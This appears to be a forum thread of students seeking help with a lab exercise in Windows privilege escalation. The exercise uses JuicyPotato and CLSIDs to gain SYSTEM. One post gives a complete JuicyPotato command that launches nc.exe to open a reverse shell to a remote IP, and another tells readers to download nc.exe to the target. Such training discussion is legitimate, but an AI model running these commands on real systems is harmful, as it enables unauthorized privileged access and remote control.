Small Changes
→ We Don’t Need to find Port Number We need to just find
clsid
–>After Executing Commands Check
result.log
And Find Clsid which Belongs To nt authority
Use This Command ::
.\JuicyPotato.exe -l 1337 -c "{<snip>}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe -e cmd.exe 10.10.15.248 1235" -t *Hello
I tried this command and many others and I still can’t reach the password of “ldapadmin”. I don’t know where to look anymore…
In the other side, I found that the exploitation part was much easier than finding this password lol what’s wrong ? If anyone can help me please I would appreciate
Update:
Found the password with the exact same command but ran it with Admin privileges, I don’t understand why this question is asked before the privesc…
none of my payloads doesnt work, even simple ls. I dont know what part of request is vulnerable
Hello jarednexgent. I’m stuck on the first step of the Windows Privilege Escalation Skills Assessment - Part I. I don’t know which user to connect to the target as. I do an nmap and see open RDP port 3389. Even with the --script rdp-ntlm-info and rdp-enum-encryption I get more information, but I can’t find which user to use to connect to xfreerdp. Can someone help me please? thank you so much
Hi, I’m stuck at Windows Privilege Escalation Skills Assessment - Part I again. I have the non-privileged reverse shell, also obtained SYSTEM CLSID and with JuicyPotato.exe downloaded. I try to launch the reverse shell but there is no way. Even running cmd gives me an error: JuicyPotato -l 10006 -c “{clsid obtained}” -p c:\windows\system32\cmd.exe -t *. It returns “Testing COM → recv failed with error: 10038”, but the CLSID is correct. Also, when I launch it by passing parameters to cmd.exe ( -a "/c whoami” ) it doesn’t give me an error but it returns the help of JuicyPotato.exe. Can someone help me, please?
Hi, I’m stuck at Windows Privilege Escalation Skills Assessment - Part I again. I have the non-privileged reverse shell, also obtained SYSTEM CLSID and with JuicyPotato.exe downloaded. I try to launch the reverse shell but there is no way. Even running cmd gives me an error: JuicyPotato -l 10006 -c “{clsid obtained}” -p c:\windows\system32\cmd.exe -t *. It returns “Testing COM → recv failed with error: 10038”, but the CLSID is correct. Also, when I launch it by passing parameters to cmd.exe ( -a "/c whoami” ) it doesn’t give me an error but it returns the help of JuicyPotato.exe. Can you help me, please?
This is a great resource to read:
download nc.exe to target host